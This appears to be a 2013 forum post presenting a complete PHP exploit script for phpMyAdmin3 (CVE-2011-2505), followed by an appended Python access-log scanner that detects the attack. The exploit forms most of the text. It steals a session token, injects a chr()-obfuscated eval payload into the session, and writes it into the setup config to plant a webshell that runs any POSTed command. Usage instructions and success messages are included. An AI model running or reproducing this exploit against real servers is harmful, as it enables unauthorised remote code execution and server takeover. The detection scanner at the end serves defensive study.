phpMyAdmin3 remote code execution exploit (PHP version)

OP, posted 2013-2-21 09:13:03
Lately I have been a full-time stay-at-home dad, out of touch with the scene for many months, and my blog has not been updated either.

Last night I was up all night with the kid and saw 黑哥's discussion of the phpMyAdmin3 vulnerability in the php security group. I had not read the vulnerable code before, but a while ago I did see wofeiwo's exp on Weibo. According to 黑哥 there is a non-"jilei" (chicken's ribs, i.e. not so useless) way to exploit it, so during the night I dug out the code, studied it a bit, and wrote this reheated exp. Since I got to it late and many people had already researched it and written exps, mine is just reheated leftovers; treat it as research to pass the time.

First, props to wofeiwo's Python version of the exp, and props to wofeiwo and superhei for their research spirit, a model to learn from. But that earlier exp had some limitations in use:
One: session.auto_start = 1;
Two: in pma3's default code the libraries directory is already blocked from access by .htaccess.
And of course there is the third gulf nobody can cross: the config directory must exist and be writable.

After reading 黑哥's remarks in the group and looking at the code again, I found that the first two limitations can both be ignored. So this vulnerability really can be not so jilei after all.

So I wrote this PHP version of the exp; the code is as follows:

#!/usr/bin/php
<?php
print_r('
+---------------------------------------------------------------------------+
pma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]
by oldjun(www.oldjun.com)
welcome to www.t00ls.net
mail: oldjun@gmail.com
Assigned CVE id: CVE-2011-2505
+---------------------------------------------------------------------------+
');

/**
 * working when the directory:"config" exists and is writeable.
 **/

if ($argc < 3) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path
host:      target server (ip/hostname)
path:      path to pma3
Example:
php '.$argv[0].' localhost /pma/
+---------------------------------------------------------------------------+
');
    exit;
}

$host = $argv[1];
$path = $argv[2];

/**
 * Try to determine if the directory:"config" exists
 **/
echo "[+] Try to determine if the directory:config exists....\n";
$returnstr=php_request('config/');
// a 404 in the response means the setup directory was removed, so nothing can be written there
if(strpos($returnstr,'404')){
    exit("[-] Exploit Failed! The directory:config do not exists!\n");
}

/**
 * Try to get token and sessionid
 **/
echo "[+] Try to get token and sessionid....\n";
$result=php_request('index.php');
// the phpMyAdmin cookie value is the session id; the token is embedded in the page links
preg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);
$token=$resp[3];
$sessionid=$resp[1];
if($token && $sessionid){
    echo "[+] token: $token\n";
    echo "[+] Session ID: $sessionid\n";
}else{
    exit("[-] Can't get token and Session ID,Exploit Failed!\n");
}

/**
 * Try to insert shell into session
 **/
echo "[+] Try to insert shell into session....\n";
php_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here.

/**
 * Try to create webshell
 **/
echo "[+] Try to create webshell....\n";
// saving the setup form writes the poisoned session value into config/config.inc.php
php_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);

/**
 * Try to check if the webshell was created successfully
 **/
echo "[+] Try to check if the webshell was created successfully....\n";
$content=php_request('config/config.inc.php');
if(strpos($content,'t00ls')){
    echo "[+] Congratulations! Expoilt successfully....\n";
    echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";
}else{
    exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");
}

// minimal raw HTTP/1.1 client: GET when $data is empty, otherwise a form POST
function php_request($url,$data='',$cookie=''){
    global  $host, $path;

    $method=$data?'POST':'GET';

    $packet = $method." ".$path.$url." HTTP/1.1\r\n";
    $packet .= "Accept: */*\r\n";
    $packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    $packet .= "Host: $host\r\n";
    $packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":"";
    $packet .= $data?"Content-Length: ".strlen($data)."\r\n":"";
    $packet .= $cookie?"Cookie: $cookie\r\n":"";
    $packet .= "Connection: Close\r\n\r\n";
    $packet .= $data?$data:"";

    $fp = fsockopen(gethostbyname($host), 80);
    if (!$fp) {
        echo 'No response from '.$host; die;
    }
    fputs($fp, $packet);

    $resp = '';

    // read until the server closes the connection (Connection: Close)
    while ($fp && !feof($fp))
        $resp .= fread($fp, 1024);

    return $resp;
}
?>
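As an added, defender-side example (not part of the post and not the author's code), the Python below scans Apache access-log lines for the request shapes the exploit above produces: `_SESSION[...]` keys and `session_to_unset` in a query string, a POST to `setup/config.php`, and a following successful fetch of a PHP file under `config/`, then correlates them per client. The log lines, IPs and the `__PAYLOAD__` placeholder are constructed for the demo.

```python
import re
from urllib.parse import unquote

# Constructed Apache combined-log lines (not from the post). The first client
# follows the request shape of the exploit above: a $_SESSION[...] injection via
# the query string, a POST that saves the setup config, then a fetch under config/.
SAMPLE_LOG = """\
10.0.0.5 - - [21/Feb/2013:09:13:01 +0800] "GET /pma/index.php HTTP/1.1" 200 5120 "-" "Mozilla/4.0"
10.0.0.5 - - [21/Feb/2013:09:13:02 +0800] "GET /pma/db_create.php?token=abc&session_to_unset=t00ls&_SESSION%5BConfigFile%5D%5BServers%5D%5B*/__PAYLOAD__/*%5D%5Bhost%5D=t00ls.net HTTP/1.1" 200 310 "-" "Mozilla/4.0"
10.0.0.5 - - [21/Feb/2013:09:13:03 +0800] "POST /pma/setup/config.php HTTP/1.1" 200 220 "-" "Mozilla/4.0"
10.0.0.5 - - [21/Feb/2013:09:13:04 +0800] "GET /pma/config/config.inc.php HTTP/1.1" 200 64 "-" "Mozilla/4.0"
10.0.0.9 - - [21/Feb/2013:09:20:00 +0800] "GET /pma/sql.php?db=test&token=def HTTP/1.1" 200 8000 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})')

def classify(line):
    """Return the indicator names triggered by one access-log line."""
    m = LINE_RE.match(line)
    if not m:
        return []
    target = unquote(m.group('target'))   # decode %5B/%5D so bracket keys are visible
    query = target.partition('?')[2]
    hits = []
    # client-supplied $_SESSION keys in the URL (the injection primitive)
    if re.search(r'(^|&)_SESSION\[', query):
        hits.append('session_injection')
    if re.search(r'(^|&)session_to_unset=', query):
        hits.append('session_to_unset')
    # saving the setup-script form is what writes the poisoned value to disk
    if m.group('method') == 'POST' and target.endswith('/setup/config.php'):
        hits.append('setup_config_save')
    # successful reads of PHP files under config/ (the generated config or new files)
    if m.group('status') == '200' and re.search(r'/config/[^/?]+\.php', target):
        hits.append('config_dir_php_fetch')
    return hits

def scan(log_text):
    """Map each client IP to the set of indicators it triggered."""
    findings = {}
    for line in log_text.splitlines():
        hits = classify(line)
        if hits:
            findings.setdefault(LINE_RE.match(line).group('ip'), set()).update(hits)
    return findings

def likely_chains(findings):
    """IPs that both injected session data and saved the setup config."""
    return sorted(ip for ip, hits in findings.items()
                  if {'session_injection', 'setup_config_save'} <= hits)
```

The durable fix remains removing the `config/` directory (or making it unwritable) once setup is done, as the post's own "third gulf" notes; this scan only tells you whether someone tried.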